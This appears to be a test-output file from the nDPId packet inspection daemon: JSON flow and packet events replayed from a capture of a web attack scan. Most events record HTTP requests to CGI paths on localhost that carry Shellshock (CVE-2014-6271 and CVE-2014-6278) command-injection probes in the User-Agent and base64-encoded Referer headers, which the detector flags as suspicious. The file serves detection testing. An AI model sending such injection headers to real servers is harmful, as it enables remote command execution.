01162{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":440,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":440,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277381,"flow_last_seen":1576420277381,"flow_idle_time":7580000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420277381,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50442,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/admin.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":441,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":441,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277383,"flow_last_seen":1576420277383,"flow_idle_time":7580000,"flow_min_l4_payload_len":222,"flow_max_l4_payload_len":222,"flow_tot_l4_payload_len":222,"midstream":1,"thread_ts_msec":1576420277383,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50444,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00775{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":441,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":441,"flow_packet_id":1,"flow_last_seen":1576420277383,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":288,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":288,"pkt_l4_len":254,"thread_ts_msec":1576420277383,"pkt":"AAAAAAAAAAAAAAAACABFAAES8w1AAEAGSNZ\/AAABfwAAAcUMH5A5v8vLlyOw2IAYAED\/BgAAAQEICp1m\/a+dZv2vR0VUIC9hZG1pbmlzdHJhdG9yLmNnaSBIVFRQLzEuMQ0KVXNlci1BZ2VudDogKCkgeyA6OyB9OyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02MjcxOiB0cnVlO2VjaG87ZWNobzsNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NCg0K"}
01170{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":441,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":441,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277383,"flow_last_seen":1576420277383,"flow_idle_time":7580000,"flow_min_l4_payload_len":222,"flow_max_l4_payload_len":222,"flow_tot_l4_payload_len":222,"midstream":1,"thread_ts_msec":1576420277383,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50444,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/administrator.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":442,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":442,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277386,"flow_last_seen":1576420277386,"flow_idle_time":7580000,"flow_min_l4_payload_len":218,"flow_max_l4_payload_len":218,"flow_tot_l4_payload_len":218,"midstream":1,"thread_ts_msec":1576420277386,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50446,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00771{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":442,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":442,"flow_packet_id":1,"flow_last_seen":1576420277386,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":284,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":284,"pkt_l4_len":250,"thread_ts_msec":1576420277386,"pkt":"AAAAAAAAAAAAAAAACABFAAEO1qdAAEAGZUB\/AAABfwAAAcUOH5C5aO5oSApQ3oAYAED\/AgAAAQEICp1m\/bKdZv2yR0VUIC9hdXRoTG9naW4uY2dpIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiAoKSB7IDo7IH07IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzE6IHRydWU7ZWNobztlY2hvOw0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
01166{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":442,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":442,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277386,"flow_last_seen":1576420277386,"flow_idle_time":7580000,"flow_min_l4_payload_len":218,"flow_max_l4_payload_len":218,"flow_tot_l4_payload_len":218,"midstream":1,"thread_ts_msec":1576420277386,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50446,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/authLogin.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":443,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":443,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277387,"flow_last_seen":1576420277387,"flow_idle_time":7580000,"flow_min_l4_payload_len":215,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"midstream":1,"thread_ts_msec":1576420277387,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50448,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00767{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":443,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":443,"flow_packet_id":1,"flow_last_seen":1576420277387,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":281,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":281,"pkt_l4_len":247,"thread_ts_msec":1576420277387,"pkt":"AAAAAAAAAAAAAAAACABFAAEL0qJAAEAGaUh\/AAABfwAAAcUQH5BC7upk6xmcJIAYAED+\/wAAAQEICp1m\/bOdZv2zR0VUIC9iYi1oaXN0LnNoIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiAoKSB7IDo7IH07IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzE6IHRydWU7ZWNobztlY2hvOw0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
01163{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":443,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":443,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277387,"flow_last_seen":1576420277387,"flow_idle_time":7580000,"flow_min_l4_payload_len":215,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"midstream":1,"thread_ts_msec":1576420277387,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50448,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/bb-hist.sh","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":444,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":444,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277389,"flow_last_seen":1576420277389,"flow_idle_time":7580000,"flow_min_l4_payload_len":215,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"midstream":1,"thread_ts_msec":1576420277389,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50450,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00767{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":444,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":444,"flow_packet_id":1,"flow_last_seen":1576420277389,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":281,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":281,"pkt_l4_len":247,"thread_ts_msec":1576420277389,"pkt":"AAAAAAAAAAAAAAAACABFAAELgRJAAEAGuth\/AAABfwAAAcUSH5B08bnUX64J5YAYAED+\/wAAAQEICp1m\/bWdZv21R0VUIC9iYW5uZXIuY2dpIEhUVFAvMS4xDQpVc2VyLUFnZW50OiAoKSB7IDo7IH07IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzE6IHRydWU7ZWNobztlY2hvOw0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KDQo="}
01163{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":444,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":444,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277389,"flow_last_seen":1576420277389,"flow_idle_time":7580000,"flow_min_l4_payload_len":215,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"midstream":1,"thread_ts_msec":1576420277389,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50450,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/banner.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":445,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":445,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277391,"flow_last_seen":1576420277391,"flow_idle_time":7580000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420277391,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50452,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00765{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":445,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":445,"flow_packet_id":1,"flow_last_seen":1576420277391,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":279,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":279,"pkt_l4_len":245,"thread_ts_msec":1576420277391,"pkt":"AAAAAAAAAAAAAAAACABFAAEJF\/tAAEAGI\/J\/AAABfwAAAcUUH5B+1S87jYTLUoAYAED+\/QAAAQEICp1m\/bedZv23R0VUIC9ib29rLmNnaSBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogKCkgeyA6OyB9OyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02MjcxOiB0cnVlO2VjaG87ZWNobzsNCkhvc3Q6IDEyNy4wLjAuMQ0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NCg0K"}
01161{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":445,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":445,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277391,"flow_last_seen":1576420277391,"flow_idle_time":7580000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420277391,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50452,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/book.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":446,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":446,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277392,"flow_last_seen":1576420277392,"flow_idle_time":7580000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"midstream":1,"thread_ts_msec":1576420277392,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50454,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00767{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":446,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":446,"flow_packet_id":1,"flow_last_seen":1576420277392,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":282,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":282,"pkt_l4_len":248,"thread_ts_msec":1576420277392,"pkt":"AAAAAAAAAAAAAAAACABFAAEM+RhAAEAGQtF\/AAABfwAAAcUWH5DPIMHTViTvW4AYAED\/AAAAAQEICp1m\/bidZv24R0VUIC9jZ2lpbmZvLmNnaSBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogKCkgeyA6OyB9OyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02MjcxOiB0cnVlO2VjaG87ZWNobzsNCg0K"}
01164{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":446,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":446,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277392,"flow_last_seen":1576420277392,"flow_idle_time":7580000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"midstream":1,"thread_ts_msec":1576420277392,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50454,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgiinfo.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":447,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":447,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277394,"flow_last_seen":1576420277394,"flow_idle_time":7580000,"flow_min_l4_payload_len":215,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"midstream":1,"thread_ts_msec":1576420277394,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50456,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00768{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":447,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":447,"flow_packet_id":1,"flow_last_seen":1576420277394,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":281,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":281,"pkt_l4_len":247,"thread_ts_msec":1576420277394,"pkt":"AAAAAAAAAAAAAAAACABFAAELY9VAAEAG2BV\/AAABfwAAAcUYH5AazFsY4\/xNyIAYAED+\/wAAAQEICp1m\/bqdZv26R0VUIC9jZ2l0ZXN0LnB5IEhUVFAvMS4xDQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiAoKSB7IDo7IH07IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzE6IHRydWU7ZWNobztlY2hvOw0KDQo="}
01163{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":447,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":447,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277394,"flow_last_seen":1576420277394,"flow_idle_time":7580000,"flow_min_l4_payload_len":215,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"midstream":1,"thread_ts_msec":1576420277394,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50456,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgitest.py","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":448,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":448,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277395,"flow_last_seen":1576420277395,"flow_idle_time":7580000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"midstream":1,"thread_ts_msec":1576420277395,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50458,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00767{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":448,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":448,"flow_packet_id":1,"flow_last_seen":1576420277395,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":282,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":282,"pkt_l4_len":248,"thread_ts_msec":1576420277395,"pkt":"AAAAAAAAAAAAAAAACABFAAEMSAFAAEAG8+h\/AAABfwAAAcUaH5B7UH87Bk0XQYAYAED\/AAAAAQEICp1m\/budZv27R0VUIC9jZ2lfd3JhcHBlciBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogKCkgeyA6OyB9OyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02MjcxOiB0cnVlO2VjaG87ZWNobzsNCg0K"}
01164{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":448,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":448,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277395,"flow_last_seen":1576420277395,"flow_idle_time":7580000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"midstream":1,"thread_ts_msec":1576420277395,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50458,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi_wrapper","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":449,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":449,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277398,"flow_last_seen":1576420277398,"flow_idle_time":7580000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"midstream":1,"thread_ts_msec":1576420277398,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50460,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00767{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":449,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":449,"flow_packet_id":1,"flow_last_seen":1576420277398,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":282,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":282,"pkt_l4_len":248,"thread_ts_msec":1576420277398,"pkt":"AAAAAAAAAAAAAAAACABFAAEMKndAAEAGEXN\/AAABfwAAAcUcH5BMbxKxdmdFb4AYAED\/AAAAAQEICp1m\/b6dZv2+R0VUIC9jb250YWN0LmNnaSBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KVXNlci1BZ2VudDogKCkgeyA6OyB9OyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02MjcxOiB0cnVlO2VjaG87ZWNobzsNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"}
01164{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":449,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":449,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277398,"flow_last_seen":1576420277398,"flow_idle_time":7580000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"midstream":1,"thread_ts_msec":1576420277398,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50460,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/contact.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":450,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":450,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277399,"flow_last_seen":1576420277399,"flow_idle_time":7580000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420277399,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50462,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
